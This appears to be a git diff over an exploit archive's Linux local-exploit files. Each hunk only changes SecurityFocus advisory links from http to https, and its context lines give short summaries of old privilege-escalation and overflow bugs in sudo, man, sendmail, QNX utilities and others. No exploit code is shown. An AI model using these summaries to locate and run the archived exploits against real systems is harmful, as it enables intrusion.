@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/2620/info +// source: https://www.securityfocus.com/bid/2620/info The innfeed utility, part of ISC InterNetNews, has an exploitable buffer overflow in its command-line parser. Specifically, innfeed will overflow if an overly long -c option is passed to it. 
diff --git a/exploits/linux/local/20778.sh b/exploits/linux/local/20778.sh index f92d378bf..f66724382 100755 --- a/exploits/linux/local/20778.sh +++ b/exploits/linux/local/20778.sh @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/2620/info +source: https://www.securityfocus.com/bid/2620/info The innfeed utility, part of ISC InterNetNews, has an exploitable buffer overflow in its command-line parser. Specifically, innfeed will overflow if an overly long -c option is passed to it. diff --git a/exploits/linux/local/20781.txt b/exploits/linux/local/20781.txt index f288587e3..0aedc746b 100644 --- a/exploits/linux/local/20781.txt +++ b/exploits/linux/local/20781.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/2629/info +source: https://www.securityfocus.com/bid/2629/info KFM is the KDE File Manager, included with version 1 of the KDE base package in most Linux installations. KFM is designed as a graphical, easily navigated interface to the Linux Filesystem. diff --git a/exploits/linux/local/20795.sh b/exploits/linux/local/20795.sh index 9d6c1c486..bf72d7d8a 100755 --- a/exploits/linux/local/20795.sh +++ b/exploits/linux/local/20795.sh @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/2645/info +source: https://www.securityfocus.com/bid/2645/info Sendfile is an implementation of the SAFT (simple asynchronous file transfer) protocol for UNIX systems. @@ -9,7 +9,7 @@ Due to a problem dropping privileges completely before running user-specified po # sfdfwd - Sendfile daemon local arbitrary command execution vulnerability # # references: -# http://www.securityfocus.com/bid/2645 +# https://www.securityfocus.com/bid/2645 # http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=76048 # # 04/24/01 psheep diff --git a/exploits/linux/local/20798.sh b/exploits/linux/local/20798.sh index 83b494cf7..c2ea1a530 100755 --- a/exploits/linux/local/20798.sh +++ b/exploits/linux/local/20798.sh 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/2652/info +source: https://www.securityfocus.com/bid/2652/info Sendfile is an implementation of the SAFT (simple asynchronous file transfer) protocol for UNIX systems. @@ -9,8 +9,8 @@ A serialization error exists in the Sendfile daemon, sendfiled. When used in con # sfdnfy - Sendfile daemon local arbitrary command execution vulnerability # # references: -# http://www.securityfocus.com/bid/2652 -# http://www.securityfocus.com/bid/2631 +# https://www.securityfocus.com/bid/2652 +# https://www.securityfocus.com/bid/2631 # # 04/24/01 psheep diff --git a/exploits/linux/local/20822.sh b/exploits/linux/local/20822.sh index 86a06d5f0..d21f80150 100755 --- a/exploits/linux/local/20822.sh +++ b/exploits/linux/local/20822.sh @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/2687/info +source: https://www.securityfocus.com/bid/2687/info Vixie cron is an implementation of the popular UNIX program that runs user-specified programs at periodic scheduled times. diff --git a/exploits/linux/local/20823.sh b/exploits/linux/local/20823.sh index 5a5a0ba4c..ee899161b 100755 --- a/exploits/linux/local/20823.sh +++ b/exploits/linux/local/20823.sh @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/2687/info +source: https://www.securityfocus.com/bid/2687/info Vixie cron is an implementation of the popular UNIX program that runs user-specified programs at periodic scheduled times. @@ -32,7 +32,7 @@ This vulnerability may be exploited to gain root privileges locally. # to also be vulnerable. # # references: -# http://www.securityfocus.com/bid/2687 +# https://www.securityfocus.com/bid/2687 # # 05/07/01 cairnsc@securityfocus.com diff --git a/exploits/linux/local/20843.txt b/exploits/linux/local/20843.txt index da18d2d3c..6f931503c 100644 --- a/exploits/linux/local/20843.txt +++ b/exploits/linux/local/20843.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/2711/info +source: https://www.securityfocus.com/bid/2711/info A heap overflow vulnerability exists in the 'man' system manual pager program. diff --git a/exploits/linux/local/20867.txt b/exploits/linux/local/20867.txt index 167f62c59..65a8ddc66 100644 --- a/exploits/linux/local/20867.txt +++ b/exploits/linux/local/20867.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/2741/info +source: https://www.securityfocus.com/bid/2741/info ARCservIT from Computer Associates contains a vulnerability which may allow malicious local users to overwrite arbitrary files. diff --git a/exploits/linux/local/20868.txt b/exploits/linux/local/20868.txt index 4a3505895..e35ae56ae 100644 --- a/exploits/linux/local/20868.txt +++ b/exploits/linux/local/20868.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/2748/info +source: https://www.securityfocus.com/bid/2748/info ARCservIT from Computer Associates contains a vulnerability which may allow malicious local users to corrupt arbitrary files. diff --git a/exploits/linux/local/20897.sh b/exploits/linux/local/20897.sh index 2479116d0..172f34af9 100755 --- a/exploits/linux/local/20897.sh +++ b/exploits/linux/local/20897.sh @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/2815/info +source: https://www.securityfocus.com/bid/2815/info A vulnerability exists in the 'man' system manual pager program. diff --git a/exploits/linux/local/20898.sh b/exploits/linux/local/20898.sh index 2b70596cf..34498f33a 100755 --- a/exploits/linux/local/20898.sh +++ b/exploits/linux/local/20898.sh @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/2815/info +source: https://www.securityfocus.com/bid/2815/info A vulnerability exists in the 'man' system manual pager program. diff --git a/exploits/linux/local/20900.txt b/exploits/linux/local/20900.txt index d508ddddf..85538a175 100644 --- a/exploits/linux/local/20900.txt +++ b/exploits/linux/local/20900.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/2828/info +source: https://www.securityfocus.com/bid/2828/info Exim is a free, open-source Mail Transfer Agent for Unix systems. diff --git a/exploits/linux/local/20901.c b/exploits/linux/local/20901.c index 31bcbc562..11a9075f5 100644 --- a/exploits/linux/local/20901.c +++ b/exploits/linux/local/20901.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/2829/info +// source: https://www.securityfocus.com/bid/2829/info Sudo (superuser do) is a security utility that allows administrator to give 'restricted' superuser privileges to certain users. diff --git a/exploits/linux/local/20926.txt b/exploits/linux/local/20926.txt index 393fce5a9..adc3ab341 100644 --- a/exploits/linux/local/20926.txt +++ b/exploits/linux/local/20926.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/2872/info +source: https://www.securityfocus.com/bid/2872/info A buffer overflow vulnerability exists in the implementation of the 'man' system manual pager program commonly included with Linux distributions. diff --git a/exploits/linux/local/20927.c b/exploits/linux/local/20927.c index ea58cf13f..ba1b4e0b7 100644 --- a/exploits/linux/local/20927.c +++ b/exploits/linux/local/20927.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/2875/info +// source: https://www.securityfocus.com/bid/2875/info BestCrypt is a commercial file system encryption software package distributed by Jetico. BestCrypt offers compatibility on the Windows and Linux platforms, using open development standards to offer a secure product. diff --git a/exploits/linux/local/20928.sh b/exploits/linux/local/20928.sh index 406ef0f74..77bafb585 100755 --- a/exploits/linux/local/20928.sh +++ b/exploits/linux/local/20928.sh @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/2878/info +source: https://www.securityfocus.com/bid/2878/info Rxvt is a color VT102 terminal emulator for X intended as an xterm(1) replacement. 
diff --git a/exploits/linux/local/20967.c b/exploits/linux/local/20967.c index 447a0c2bb..6b67fa32b 100644 --- a/exploits/linux/local/20967.c +++ b/exploits/linux/local/20967.c @@ -1,5 +1,5 @@ /* -source: http://www.securityfocus.com/bid/2927/info +source: https://www.securityfocus.com/bid/2927/info Vim is an enhanced version of the popular text editor vi. diff --git a/exploits/linux/local/20979.c b/exploits/linux/local/20979.c index ff015a523..6c1e8b866 100644 --- a/exploits/linux/local/20979.c +++ b/exploits/linux/local/20979.c @@ -1,5 +1,5 @@ /* -source: http://www.securityfocus.com/bid/2937/info +source: https://www.securityfocus.com/bid/2937/info The Linux /proc filesystem is a virtual filesystem provided by the Linux Kernel as an interface to some process and system information and parameters. diff --git a/exploits/linux/local/20986.c b/exploits/linux/local/20986.c index 5a0538d8a..5e1bb7e72 100644 --- a/exploits/linux/local/20986.c +++ b/exploits/linux/local/20986.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/2955/info +// source: https://www.securityfocus.com/bid/2955/info Xvt is a terminal emulator for systems using X11R6. It is often installed setuid/setgid so that it runs with the enhanced privileges required to log user sessions. diff --git a/exploits/linux/local/20988.c b/exploits/linux/local/20988.c index 21c1817ff..4e78d93d8 100644 --- a/exploits/linux/local/20988.c +++ b/exploits/linux/local/20988.c @@ -1,5 +1,5 @@ /* -source: http://www.securityfocus.com/bid/2958/info +source: https://www.securityfocus.com/bid/2958/info CylantSecure is a commercial Linux hardening tool and security infrastructure available from Cylant Technology. diff --git a/exploits/linux/local/20990.c b/exploits/linux/local/20990.c index 4863b9076..007840f18 100644 --- a/exploits/linux/local/20990.c +++ b/exploits/linux/local/20990.c 
@@ -1,5 +1,5 @@ /* -source: http://www.securityfocus.com/bid/2974/info +source: https://www.securityfocus.com/bid/2974/info teTeX is a TeX distribution for UNIX compatible systems. diff --git a/exploits/linux/local/20992.c b/exploits/linux/local/20992.c index 95c0a9950..db4feb72c 100644 --- a/exploits/linux/local/20992.c +++ b/exploits/linux/local/20992.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/2984/info +// source: https://www.securityfocus.com/bid/2984/info Jon Zeeff's lmail is a local mail delivery agent (LDA) designed to provide mail-to-pipe and mail-to-file aliasing for smail. diff --git a/exploits/linux/local/21010.sh b/exploits/linux/local/21010.sh index 6ce69f3c5..f72acea3c 100755 --- a/exploits/linux/local/21010.sh +++ b/exploits/linux/local/21010.sh @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/3030/info +source: https://www.securityfocus.com/bid/3030/info xman is a component included with the XFree86 Window System. diff --git a/exploits/linux/local/21014.c b/exploits/linux/local/21014.c index 81dc3a703..35320588c 100644 --- a/exploits/linux/local/21014.c +++ b/exploits/linux/local/21014.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/3054/info +// source: https://www.securityfocus.com/bid/3054/info Slackware Linux contains a configuration error that enables local users to create files in the directory used by the system manual pager ('man') for cache files. diff --git a/exploits/linux/local/21043.c b/exploits/linux/local/21043.c index 4e7e583d9..939c56bb5 100644 --- a/exploits/linux/local/21043.c +++ b/exploits/linux/local/21043.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/3127/info +// source: https://www.securityfocus.com/bid/3127/info GNU locate is an application that searches file databases for file names that match user-supplied patterns. diff --git a/exploits/linux/local/21060.c b/exploits/linux/local/21060.c index 881ffacdc..d709e4e97 100644 --- a/exploits/linux/local/21060.c 
+++ b/exploits/linux/local/21060.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/3163/info +// source: https://www.securityfocus.com/bid/3163/info An input validation error exists in Sendmail's debugging functionality. diff --git a/exploits/linux/local/21061.c b/exploits/linux/local/21061.c index b42f781f8..b274a1cd0 100644 --- a/exploits/linux/local/21061.c +++ b/exploits/linux/local/21061.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/3163/info +// source: https://www.securityfocus.com/bid/3163/info An input validation error exists in Sendmail's debugging functionality. diff --git a/exploits/linux/local/21062.txt b/exploits/linux/local/21062.txt index 2e76eb1b7..2f4d7cc4c 100644 --- a/exploits/linux/local/21062.txt +++ b/exploits/linux/local/21062.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/3163/info +source: https://www.securityfocus.com/bid/3163/info An input validation error exists in Sendmail's debugging functionality. diff --git a/exploits/linux/local/21063.txt b/exploits/linux/local/21063.txt index c5fc9e667..aeb677b71 100644 --- a/exploits/linux/local/21063.txt +++ b/exploits/linux/local/21063.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/3163/info +source: https://www.securityfocus.com/bid/3163/info An input validation error exists in Sendmail's debugging functionality. diff --git a/exploits/linux/local/21124.txt b/exploits/linux/local/21124.txt index 18cac4047..d630d705a 100644 --- a/exploits/linux/local/21124.txt +++ b/exploits/linux/local/21124.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/3447/info +source: https://www.securityfocus.com/bid/3447/info Linux contains a vulnerability in it's exec() implementation that may allow for modification of setuid process memory via ptrace(). The vulnerability is due to the fact that it is possible for a traced process to exec() a setuid image if the tracing process is setuid. 
diff --git a/exploits/linux/local/21158.c b/exploits/linux/local/21158.c index 8cd7b361f..0f9abd643 100644 --- a/exploits/linux/local/21158.c +++ b/exploits/linux/local/21158.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/3572/info +// source: https://www.securityfocus.com/bid/3572/info Parallel Make (pmake) is a freely available version of the make program, originally distributed with Berkeley Unix. It is designed to execute Makefiles and build programs. diff --git a/exploits/linux/local/21159.c b/exploits/linux/local/21159.c index 8f24682a0..14ddca483 100644 --- a/exploits/linux/local/21159.c +++ b/exploits/linux/local/21159.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/3573/info +// source: https://www.securityfocus.com/bid/3573/info Parallel Make (pmake) is a freely available version of the make program, originally distributed with Berkeley Unix. It is designed to execute Makefiles and build programs. diff --git a/exploits/linux/local/21216.sh b/exploits/linux/local/21216.sh index 8fa4a5ba7..f697dbe8d 100755 --- a/exploits/linux/local/21216.sh +++ b/exploits/linux/local/21216.sh @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/3865/info +source: https://www.securityfocus.com/bid/3865/info CDRDAO is a freely available, open source CD recording software package available for the Unix and Linux Operating Systems. It is maintained by Andreas Mueller. diff --git a/exploits/linux/local/21217.sh b/exploits/linux/local/21217.sh index 0e915e168..33cb6465a 100755 --- a/exploits/linux/local/21217.sh +++ b/exploits/linux/local/21217.sh @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/3865/info +source: https://www.securityfocus.com/bid/3865/info CDRDAO is a freely available, open source CD recording software package available for the Unix and Linux Operating Systems. It is maintained by Andreas Mueller. diff --git a/exploits/linux/local/21218.sh b/exploits/linux/local/21218.sh index 8523e934d..3af2b69f0 100755 
--- a/exploits/linux/local/21218.sh +++ b/exploits/linux/local/21218.sh @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/3865/info +source: https://www.securityfocus.com/bid/3865/info CDRDAO is a freely available, open source CD recording software package available for the Unix and Linux Operating Systems. It is maintained by Andreas Mueller. diff --git a/exploits/linux/local/21219.sh b/exploits/linux/local/21219.sh index 5ceea59bc..4ed671060 100755 --- a/exploits/linux/local/21219.sh +++ b/exploits/linux/local/21219.sh @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/3865/info +source: https://www.securityfocus.com/bid/3865/info CDRDAO is a freely available, open source CD recording software package available for the Unix and Linux Operating Systems. It is maintained by Andreas Mueller. diff --git a/exploits/linux/local/21226.c b/exploits/linux/local/21226.c index 69420d119..bc2840ef4 100644 --- a/exploits/linux/local/21226.c +++ b/exploits/linux/local/21226.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/3868/info +// source: https://www.securityfocus.com/bid/3868/info Imlib2 is a freely available, open source graphics library available for the Linux and Unix operating systems. It is maintained by Michael Jennings. diff --git a/exploits/linux/local/21227.sh b/exploits/linux/local/21227.sh index 863d89301..202c836db 100755 --- a/exploits/linux/local/21227.sh +++ b/exploits/linux/local/21227.sh @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/3871/info +source: https://www.securityfocus.com/bid/3871/info Sudo is a freely available, open source permissions management software package available for the Linux and Unix operating systems. It is maintained by Todd C. Miller. diff --git a/exploits/linux/local/21229.txt b/exploits/linux/local/21229.txt index 7997a24e2..d07eb11cd 100644 --- a/exploits/linux/local/21229.txt +++ b/exploits/linux/local/21229.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/3886/info +source: https://www.securityfocus.com/bid/3886/info at is a freely available, open source scheduler package. It is included with various Unix and Linux operating systems, and maintained by public domain. diff --git a/exploits/linux/local/21231.c b/exploits/linux/local/21231.c index 887ecc4fc..135ab41b3 100644 --- a/exploits/linux/local/21231.c +++ b/exploits/linux/local/21231.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/3896/info +// source: https://www.securityfocus.com/bid/3896/info Chinput is an input server designed for Chinese characters. It is available on Linux and other Unix based systems. Chinput appears to be installed suid root by default. diff --git a/exploits/linux/local/21247.c b/exploits/linux/local/21247.c index cf701aaf1..4075ef5b1 100644 --- a/exploits/linux/local/21247.c +++ b/exploits/linux/local/21247.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/3970/info +// source: https://www.securityfocus.com/bid/3970/info BRU is a commercially available backup software infrastructure available for both UNIX and Linux Operating Systems. It is distributed and maintained by the Tolis Group. diff --git a/exploits/linux/local/21248.txt b/exploits/linux/local/21248.txt index 2d4d93ef0..2106e0228 100644 --- a/exploits/linux/local/21248.txt +++ b/exploits/linux/local/21248.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/3973/info +source: https://www.securityfocus.com/bid/3973/info User-Mode Linux (UML) is a patch which allows the Linux Kernel to run as a user space process. It is currently available for the Linux operating system. It may be used as an efficient tool for kernel development, as well as for virtual networking, honeypots, and experimentation. diff --git a/exploits/linux/local/21258.bat b/exploits/linux/local/21258.bat index 7dae459c0..d57a523ce 100644 --- a/exploits/linux/local/21258.bat +++ b/exploits/linux/local/21258.bat 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/3989/info +source: https://www.securityfocus.com/bid/3989/info There exists a condition in Microsoft Windows operating systems using NTFS that may allow for files to be hidden. diff --git a/exploits/linux/local/21259.java b/exploits/linux/local/21259.java index ff614b61c..e1a18b48a 100644 --- a/exploits/linux/local/21259.java +++ b/exploits/linux/local/21259.java @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/3992/info +source: https://www.securityfocus.com/bid/3992/info Java programs run in an intepreted environment, the Java Virtual Machine (JVM). Sun has provided a reference JVM implementation for multiple platforms, including Solaris, Windows and Linux. diff --git a/exploits/linux/local/21280.c b/exploits/linux/local/21280.c index 660740d9d..9c3c09b2d 100644 --- a/exploits/linux/local/21280.c +++ b/exploits/linux/local/21280.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/4050/info +// source: https://www.securityfocus.com/bid/4050/info Hanterm is a replacement for xterm which includes Hangul support, used for Korean language systems. diff --git a/exploits/linux/local/21281.c b/exploits/linux/local/21281.c index f2bc0e8d6..54be9b47a 100644 --- a/exploits/linux/local/21281.c +++ b/exploits/linux/local/21281.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/4050/info +// source: https://www.securityfocus.com/bid/4050/info Hanterm is a replacement for xterm which includes Hangul support, used for Korean language systems. diff --git a/exploits/linux/local/21302.c b/exploits/linux/local/21302.c index f63e6ef89..d4c871369 100644 --- a/exploits/linux/local/21302.c +++ b/exploits/linux/local/21302.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/4174/info +// source: https://www.securityfocus.com/bid/4174/info Term is a commercially available software package for Unix and Linux operating systems. It is distributed and maintained by Century Software. 
diff --git a/exploits/linux/local/21341.c b/exploits/linux/local/21341.c index 462526c2c..85e2e0ca1 100644 --- a/exploits/linux/local/21341.c +++ b/exploits/linux/local/21341.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/4271/info +// source: https://www.securityfocus.com/bid/4271/info Ecartis is the new name for the Listar software product. Listar is a mailing list management package for Linux, BSD, and other Unix like operating systems. diff --git a/exploits/linux/local/21342.c b/exploits/linux/local/21342.c index 039a7a980..c3c255378 100644 --- a/exploits/linux/local/21342.c +++ b/exploits/linux/local/21342.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/4271/info +// source: https://www.securityfocus.com/bid/4271/info Ecartis is the new name for the Listar software product. Listar is a mailing list management package for Linux, BSD, and other Unix like operating systems. diff --git a/exploits/linux/local/21348.txt b/exploits/linux/local/21348.txt index 88d8e9b57..efb93e5b2 100644 --- a/exploits/linux/local/21348.txt +++ b/exploits/linux/local/21348.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/4329/info +source: https://www.securityfocus.com/bid/4329/info Webmin is a web-based interface for system administration of Unix and Linux operating systems. diff --git a/exploits/linux/local/21353.c b/exploits/linux/local/21353.c index 67392afbc..26d9200e8 100644 --- a/exploits/linux/local/21353.c +++ b/exploits/linux/local/21353.c @@ -1,5 +1,5 @@ /* -source: http://www.securityfocus.com/bid/4367/info +source: https://www.securityfocus.com/bid/4367/info The Linux kernel d_path() function converts a dentry structure into an ASCII path name. The full path to the specified dentry is returned in a fixed length buffer of size PAGE_SIZE bytes. diff --git a/exploits/linux/local/21356.sh b/exploits/linux/local/21356.sh index 6a0df44ec..ac43635c1 100755 --- a/exploits/linux/local/21356.sh +++ b/exploits/linux/local/21356.sh 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/4374/info +source: https://www.securityfocus.com/bid/4374/info LogWatch is a freely available, open source script for monitoring log files. It may be used with the Linux and Unix Operating systems. diff --git a/exploits/linux/local/21362.c b/exploits/linux/local/21362.c index a7e58c9d6..4a3626a8b 100644 --- a/exploits/linux/local/21362.c +++ b/exploits/linux/local/21362.c @@ -1,5 +1,5 @@ /* -source: http://www.securityfocus.com/bid/4413/info +source: https://www.securityfocus.com/bid/4413/info Oracle 8i is a powerful relational database product. It is available for Windows, Linux, and a wide range of Unix operating systems. diff --git a/exploits/linux/local/21375.txt b/exploits/linux/local/21375.txt index 559ae3a62..7b28c9bc5 100644 --- a/exploits/linux/local/21375.txt +++ b/exploits/linux/local/21375.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/4501/info +source: https://www.securityfocus.com/bid/4501/info The Internet Software Consortium (ISC) Internet News (INN) project is a powerful, mature implementation of a usenet system, including a NNTP server and a newsreading server. It is available for a wide range of Unix based systems, including Linux. diff --git a/exploits/linux/local/21398.txt b/exploits/linux/local/21398.txt index 3583760db..58cc74e5d 100644 --- a/exploits/linux/local/21398.txt +++ b/exploits/linux/local/21398.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/4547/info +source: https://www.securityfocus.com/bid/4547/info SSH (and derivatives) is the protocol Secure Shell protocol implementation. It is available for various operating systems, although this vulnerability affects operating systems such as Unix and Linux. diff --git a/exploits/linux/local/21420.c b/exploits/linux/local/21420.c index dbc7dcae1..2a47a6108 100644 --- a/exploits/linux/local/21420.c +++ b/exploits/linux/local/21420.c 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/4593/info +// source: https://www.securityfocus.com/bid/4593/info Sudo is a widely used Linux/Unix utility allow users to securely run commands as other users. diff --git a/exploits/linux/local/21458.txt b/exploits/linux/local/21458.txt index ae3a30157..610e2beea 100644 --- a/exploits/linux/local/21458.txt +++ b/exploits/linux/local/21458.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/4762/info +source: https://www.securityfocus.com/bid/4762/info An attacker with root access may be able to write to kernel memory in spite of the security patch provided by grsecurity. The patch operates by redirecting the write() system call, when it is being used to write to a memory device. Unfortunately, there are other methods that can be used to write to kernel memory (such as mapping the device to memory using mmap()). diff --git a/exploits/linux/local/21496.c b/exploits/linux/local/21496.c index f0337c8e0..032c2a4ca 100644 --- a/exploits/linux/local/21496.c +++ b/exploits/linux/local/21496.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/4891/info +// source: https://www.securityfocus.com/bid/4891/info Informix is an enterprise database distributed and maintained by IBM. diff --git a/exploits/linux/local/21497.pl b/exploits/linux/local/21497.pl index 35a1abfb7..350874a90 100755 --- a/exploits/linux/local/21497.pl +++ b/exploits/linux/local/21497.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/4891/info +source: https://www.securityfocus.com/bid/4891/info Informix is an enterprise database distributed and maintained by IBM. diff --git a/exploits/linux/local/21499.txt b/exploits/linux/local/21499.txt index af6e60fde..a0cad0d29 100644 --- a/exploits/linux/local/21499.txt +++ b/exploits/linux/local/21499.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/4901/info +source: https://www.securityfocus.com/bid/4901/info The QNX RTOS crttrap binary includes a command-line option for specifying a configuration file. crttrap is installed setuid by default. crttrap Local attackers may specify an arbitrary system file in place of the configuration file and crttrap will disclose the contents of the arbitrary file. diff --git a/exploits/linux/local/21500.txt b/exploits/linux/local/21500.txt index 8d03a986b..89e8908f8 100644 --- a/exploits/linux/local/21500.txt +++ b/exploits/linux/local/21500.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/4902/info +source: https://www.securityfocus.com/bid/4902/info The QNX RTOS monitor utility is prone to an issue which may allow local attackers to modify arbitrary system files (such as /etc/passwd). monitor is installed setuid root by default. diff --git a/exploits/linux/local/21501.txt b/exploits/linux/local/21501.txt index dfe791fc2..682ab772c 100644 --- a/exploits/linux/local/21501.txt +++ b/exploits/linux/local/21501.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/4904/info +source: https://www.securityfocus.com/bid/4904/info When creating memory dump files, the QNX RTOS debugging utility 'dumper' follows symbolic links. It also sets ownership of the file to the userid of the terminated process. It is possible for malicious local attackers to exploit this vulnerability to overwrite and gain ownership of arbitrary files. Consequently, attackers may elevate to root privileges by modifying files such as '/etc/passwd'. diff --git a/exploits/linux/local/21502.txt b/exploits/linux/local/21502.txt index 1eaabe362..a7339deab 100644 --- a/exploits/linux/local/21502.txt +++ b/exploits/linux/local/21502.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/4914/info +source: https://www.securityfocus.com/bid/4914/info It has been reported that the 'su' utility for QNX RTOS accepts the SIGSEGV signal and dumps a world readable core file. An attacker is able to analyze the core file and obtain very sensitive information. diff --git a/exploits/linux/local/21503.sh b/exploits/linux/local/21503.sh index 4df20b33b..f09c9177d 100755 --- a/exploits/linux/local/21503.sh +++ b/exploits/linux/local/21503.sh @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/4915/info +source: https://www.securityfocus.com/bid/4915/info The QNX phgrafx utility is prone to an issue which may make it possible for local attackers to escalate privileges. This issue is due to unsafe use of the system() function to invoke other programs. This vulnerability may be trivially exploited to gain root privileges. diff --git a/exploits/linux/local/21504.sh b/exploits/linux/local/21504.sh index 83efe2ca8..37ba68262 100755 --- a/exploits/linux/local/21504.sh +++ b/exploits/linux/local/21504.sh @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/4916/info +source: https://www.securityfocus.com/bid/4916/info The QNX phgrafx-startup utility is prone to an issue which may make it possible for local attackers to escalate privileges. This issue is due to unsafe use of the system() function to invoke other programs. This vulnerability may be trivially exploited to gain root privileges. diff --git a/exploits/linux/local/21505.c b/exploits/linux/local/21505.c index 8d84ea941..e21fa860f 100644 --- a/exploits/linux/local/21505.c +++ b/exploits/linux/local/21505.c 
@@ -1,5 +1,5 @@ /* -source: http://www.securityfocus.com/bid/4917/info +source: https://www.securityfocus.com/bid/4917/info The QNX phlocale utility is prone to an exploitable buffer overflow condition. This is due to insufficient bounds checking of the ABLANG environment variable. Exploitation of this issue may result in execution of arbitrary attacker-supplied instructions as root. */ diff --git a/exploits/linux/local/21506.c b/exploits/linux/local/21506.c index 97ec0dddf..9d50a93d6 100644 --- a/exploits/linux/local/21506.c +++ b/exploits/linux/local/21506.c @@ -1,5 +1,5 @@ /* -source: http://www.securityfocus.com/bid/4918/info +source: https://www.securityfocus.com/bid/4918/info It has been reported that the pkg-installer utility for QNX is vulnerable to a buffer overflow condition. diff --git a/exploits/linux/local/21507.sh b/exploits/linux/local/21507.sh index 6d7cb221e..98aaf4e50 100755 --- a/exploits/linux/local/21507.sh +++ b/exploits/linux/local/21507.sh @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/4919/info +source: https://www.securityfocus.com/bid/4919/info The QNX implementation of 'ptrace()' is reportedly insecure. An unprivileged process may attach to a setuid program without restriction. Since the attaching process may view or edit memory, an attacker may exploit this issue to escalate privileges. diff --git a/exploits/linux/local/21538.c b/exploits/linux/local/21538.c index 5ab3e4785..f792f254d 100644 --- a/exploits/linux/local/21538.c +++ b/exploits/linux/local/21538.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/5001/info +// source: https://www.securityfocus.com/bid/5001/info A vulnerability has been reported for simpleinit that may allow users to execute arbitrary commands as the superuser. diff --git a/exploits/linux/local/21568.c b/exploits/linux/local/21568.c index a29f00775..71cd2330f 100644 --- a/exploits/linux/local/21568.c +++ b/exploits/linux/local/21568.c 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/5056/info +// source: https://www.securityfocus.com/bid/5056/info The Cisco VPN Client software is used to establish Virtual Private Network (VPN) connections between client machines and a Cisco VPN Concentrator. diff --git a/exploits/linux/local/21583.pl b/exploits/linux/local/21583.pl index 48ef8fef2..d93b36eff 100755 --- a/exploits/linux/local/21583.pl +++ b/exploits/linux/local/21583.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/5125/info +source: https://www.securityfocus.com/bid/5125/info Bonobo is a set of tools and CORBA interfaces included as part of the Gnome infrastructure. It is designed for use on the Linux and Unix operating systems. diff --git a/exploits/linux/local/21584.pl b/exploits/linux/local/21584.pl index 7b87a69b5..39b0a56c6 100755 --- a/exploits/linux/local/21584.pl +++ b/exploits/linux/local/21584.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/5125/info +source: https://www.securityfocus.com/bid/5125/info Bonobo is a set of tools and CORBA interfaces included as part of the Gnome infrastructure. It is designed for use on the Linux and Unix operating systems. diff --git a/exploits/linux/local/21585.c 